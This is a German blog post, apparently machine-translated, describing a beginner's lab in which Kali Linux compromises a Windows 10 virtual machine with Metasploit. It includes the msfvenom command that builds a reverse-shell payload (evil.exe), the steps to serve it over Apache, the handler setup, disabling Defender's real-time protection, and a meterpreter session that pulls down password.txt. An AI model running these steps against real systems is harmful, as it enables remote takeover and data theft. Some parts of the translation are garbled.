[LINUX] Erster Windows 10 Hack

Ich möchte die Angriffsmethode kennen und eine Person mit hohem Sicherheitsbewusstsein werden. Weil es vor dem Gebäude ist, sind Hacker cool, oder? Ich fing an, das Hacken mit dem Motiv zu üben.

Es ist der 4. Tag des Adventskalenders von PRO Co., Ltd. Es geht nicht darum, etwas zu machen, aber bitte verzeihen Sie mir, dass ich gesagt habe "Ich wünschte, ich hätte es!" ...

Dinge die zu tun sind

Erstellen Sie eine experimentelle Windows-Umgebung mit VM, Angriff und Fernsteuerung aus einer anderen Umgebung (Kali Linux). Es ist länger, aber es gibt mehr Bilder.

* Nein, absolut.

In diesem Artikel werden Cyberangriffe wie nicht autorisierter Zugriff nicht empfohlen. Bitte wenden Sie die hier vorgestellten Inhalte nicht auf die externe Umgebung an.

bereiten

Erstellen Sie zunächst das Angriffsterminal und das Zielterminal mit VM. Diesmal wurde es in der folgenden Umgebung durchgeführt.

Aufbau einer Angriffsumgebung

Kali Linux ist eine Linux-Distribution, die für Penetrationstests verwendet wird. Es basiert auf Debian und ist mit über 300 Penetrationstest-Tools vorinstalliert.

Ich werde dieses Mal Kali Linux verwenden, aber es ist in Ordnung, das Angriffstool auf dem Betriebssystem zu installieren, mit dem Sie vertraut sind.

Kali Linux installieren

Laden Sie das Kali Linux-Image von der folgenden Seite herunter. https://www.kali.org/downloads/ Dieses Mal habe ich "Kali Linux 64-Bit" heruntergeladen.

In diesem Artikel werde ich die detaillierte Installationsmethode weglassen.

Erstellen einer experimentellen Windows-Umgebung

Laden Sie das Windows 10-Image herunter

Laden Sie die Windows 10-ISO-Datei von der folgenden Seite herunter. https://www.microsoft.com/ja-jp/software-download/windows10ISO

VM-Erstellung

Erstellen Sie eine virtuelle Maschine aus einer neuen VirtualBox. スクリーンショット 2019-12-01 20.42.31.png スクリーンショット 2019-12-01 20.43.16.png スクリーンショット 2019-12-01 20.43.43.png スクリーンショット 2019-12-01 20.43.58.png スクリーンショット 2019-12-01 20.44.35.png スクリーンショット 2019-12-01 20.44.55.png スクリーンショット 2019-12-01 20.45.06.png Es ist fertig.

Installation & Setup

--Entfernen Sie die ISO-Datei vom virtuellen Laufwerk Beenden Sie Windows 10 einmal und öffnen Sie VirtualBox-Einstellungen> Speicher. Klicken Sie auf das Festplattensymbol rechts neben dem optischen Laufwerk und wählen Sie Festplatte vom virtuellen Laufwerk entfernen. スクリーンショット 2019-12-01 22.06.23.png

Du bist bereit zu gehen!

Angriff (Hauptgeschichte)

Dieses Angriffsexperiment wird in der folgenden Umgebung durchgeführt. Das Angriffsterminal und das Zielterminal sollten sich im selben Netzwerk befinden.

Terminal IP Adresse
Kali Linux (Angriffsterminal) 10.0.0.2
Windows10 (Zielterminal) 10.0.0.102

Ermöglichen Sie Angriffsterminals, Zielterminals zu steuern

Erstellen Sie mit dem Metasploit Framework eine Reverse Shell und führen Sie sie auf dem Zielgerät aus.

Was ist Metasploit Framework?

Es handelt sich um ein Open-Source-Penetrationstest-Tool, das eine Reihe von Servereinbrüchen ausführen kann, z. B. Untersuchung, Eindringen, Angriff und Installation / Anschluss von Hintertüren. Es wird standardmäßig in Kali Linux bereitgestellt.

Nutzdaten erstellen

Eine Nutzlast ist ein ausführbarer Code, der sich böswillig verhält. Dieses Mal erstellen wir eine TCP-Reverse-Shell-Nutzlast.

Mit dem folgenden Befehl wird eine TCP-Reverse-Shell erstellt, die auf 64-Bit-Fenster abzielt und das Verbindungsziel als Angriffsterminal (10.0.0.2) angibt.

# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 -f exe -o /root/Desktop/evil.exe

Machen Sie die ausführbare Datei von außen zugänglich

Die erstellte Nutzlast muss auf irgendeine Weise vom Zielterminal ausgeführt werden. Starten Sie diesmal Apache, damit Sie über den Browser des Zielterminals darauf zugreifen können.

# mkdir /var/www/html/share
# cp /root/Desktop/evil.exe /var/www/html/share/
# service apache2 restart

Lassen Sie das Zielterminal die Nutzdaten herunterladen

Greifen Sie über den Browser auf der Windows10-Seite auf http://10.0.0.2/share zu. スクリーンショット 2019-12-04 7.37.36.png

Ich habe bestätigt, dass evil.exe existiert, also werde ich es herunterladen.

Als ich auf evil.exe geklickt und es ausgeführt habe, ist es fehlgeschlagen, da es von Windows Defender Antivirus als Virus erkannt wurde. スクリーンショット 2019-12-04 7.40.05.png

Wenn Sie auf die Benachrichtigung unten rechts klicken, werden Sie ein wenig aufgeregt sein, den Namen Troys Pferd zu sehen, das Sie gehört haben. スクリーンショット 2019-12-04 8.14.08.png

Als ich unter "Betrieb" "Zulassen" auswählte und erneut versuchte, es zu speichern, änderte sich die Anzeige. Klicken Sie in diesem Status zum Speichern auf Ausführen. スクリーンショット 2019-12-04 8.14.42.png

Deaktivieren Sie dann den "Echtzeitschutz" im Windows Defender Security Center und laden Sie ihn erneut herunter. スクリーンショット 2019-12-04 8.19.15.png Die detaillierte Einstellungsmethode finden Sie hier (https://121ware.com/qasearch/1007/app/servlet/relatedqa?QID=018503).

スクリーンショット 2019-12-04 8.21.39.png Diesmal war der Download ohne Vorwarnung erfolgreich.

Wenn Sie den Ordner öffnen, sehen Sie, dass zwei Dateien vorhanden sind, eine, die gespeichert ist, wenn der Echtzeitschutz aktiviert ist (evil.exe), und eine, die gespeichert ist, wenn der Echtzeitschutz deaktiviert ist (evil (1) .exe). スクリーンショット 2019-12-04 8.28.52.png

Warten Sie auf der Rückseite auf die angreifende Seite

Führen Sie den folgenden Befehl auf dem angreifenden Terminal aus und warten Sie auf die Verbindung durch die Reverse Shell.

# msfconsole      <----Eingang
[-] ***Rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .


       =[ metasploit v5.0.62-dev                          ]
+ -- --=[ 1949 exploits - 1090 auxiliary - 334 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]


 msf5> Exploit / Multi / Handler <---- Eingabe verwenden
 msf5 Exploit (Multi / Handler)> Payload Windows / x64 / meterpreter / reverse_tcp <---- Eingabe setzen
payload => windows/x64/meterpreter/reverse_tcp
 msf5 Exploit (Multi / Handler)> LHOST 10.0.0.2 <---- Eingabe setzen
LHOST=>10.0.0.2
 msf5 Exploit (Multi / Handler)> Exploit -j -z <---- Eingabe
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

 [*] Reverse TCP-Handler am 10.0.0.2 gestartet: 4444 <---- Hören Sie zu
msf5 exploit(multi/handler) > 

###Führen Sie die Nutzdaten auf dem Zielterminal aus

Führen Sie die Nutzdaten auf der Windows-Seite aus. Der heruntergeladene, wenn der Echtzeitschutz aktiviert ist, und der heruntergeladene, wenn der Echtzeitschutz deaktiviert ist, werden insgesamt viermal im Muster des aktivierten Echtzeitschutzes ausgeführt.

[Zum Zeitpunkt des Downloads]
Echtzeitschutz aktiviert
(evil.exe)
[Zum Zeitpunkt des Downloads]
Echtzeitschutz deaktiviert
(evil(1).exe)
【Laufzeit】
Echtzeitschutz aktiviert
Angriffsfehler Angriffsfehler
【Laufzeit】
Echtzeitschutz deaktiviert
Angriffsfehler Erfolgreicher Angriff

Alle geben zur Laufzeit eine Warnung, aber Details>Durch Ausführung zwangsweise ausführen. Screenshot 2019-12-04 9.00.17.png

Klicken Sie hier, um den Bildschirm zum Zeitpunkt des Fehlers anzuzeigen. Screenshot 2019-12-04 9.03.19.png

Bei Erfolg wird Folgendes auf der angreifenden Konsole angezeigt.

msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.0.0.102
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.102:49975) at 2019-12-04 09:08:01 +0900

Drücken Sie in diesem Zustand die Eingabetaste und verwenden Sie dann den Befehl session, um die Sitzungsliste anzuzeigen.

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  2         meterpreter x64/windows  DESKTOP-4V3PT8F\arakawa @ DESKTOP-4V3PT8F  10.0.0.2:4444 -> 10.0.0.102:49975 (10.0.0.102)

Angriffsumgebung (10.0.0.2) zur Zielumgebung (10).0.0.Die Verbindung zu 102) wurde bestätigt.

###Fernbedienung an der Meterpreter-Eingabeaufforderung

Dann Passwort für das Experiment.Erstellen Sie eine txt-Datei auf der Windows-Seite. Screenshot 2019-12-04 9.16.07.png

Zeigen Sie die Meterpreter-Eingabeaufforderung an, indem Sie die Sitzungs-ID auf der Angreiferseite angeben.

msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > 

password.Suchen und laden Sie txt herunter.

meterpreter > pwd
C:\Users\arakawa\Downloads
meterpreter > ls
Listing: C:\Users\arakawa\Downloads
===================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-12-01 21:24:25 +0900  desktop.ini
100777/rwxrwxrwx  7168  fil   2019-12-04 08:21:32 +0900  evil (1).exe
100777/rwxrwxrwx  7168  fil   2019-12-04 09:07:02 +0900  evil.exe
100666/rw-rw-rw-  8     fil   2019-12-04 09:15:30 +0900  password.txt

meterpreter > download password.txt
[*] Downloading: password.txt -> password.txt
[*] Downloaded 8.00 B of 8.00 B (100.0%): password.txt -> password.txt
[*] download   : password.txt -> password.txt
meterpreter > 

Öffnen Sie ein anderes Terminal und stellen Sie sicher, dass Sie es herunterladen können.

root@kali:~# ls -la password.txt 
-rw-r--r-- 1 root root 8 Dec  4 09:15 password.txt

Ich konnte es sicher herunterladen (?)! !!

#Zusammenfassung

Ich habe Kali Linux verwendet, um Windows 10 anzugreifen, und mit der Fernbedienung experimentiert. Es war überraschend, dass es einfacher war als ich erwartet hatte. Persönlich denke ich, dass es eine Ernte ist, zu erkennen, dass Windows Defender einen guten Job macht.

Der nächste Schritt besteht darin, eine Hintertür zu erstellen, die Nutzlast zu fälschen und vieles mehr, damit ich mehr schreiben kann.

#Nachschlagewerk

IPUSIRON "Wie man ein Hacking-Labor erstellt: Hacker-Erfahrung beim Lernen in einer virtuellen Umgebung" Shosuisha (amazon)

Recommended Posts

Erster Windows 10 Hack
Fortsetzung, erster Windows 10-Hack
Erste Flasche
Erster Entwurf
Erster Python-Review-
Erste gdb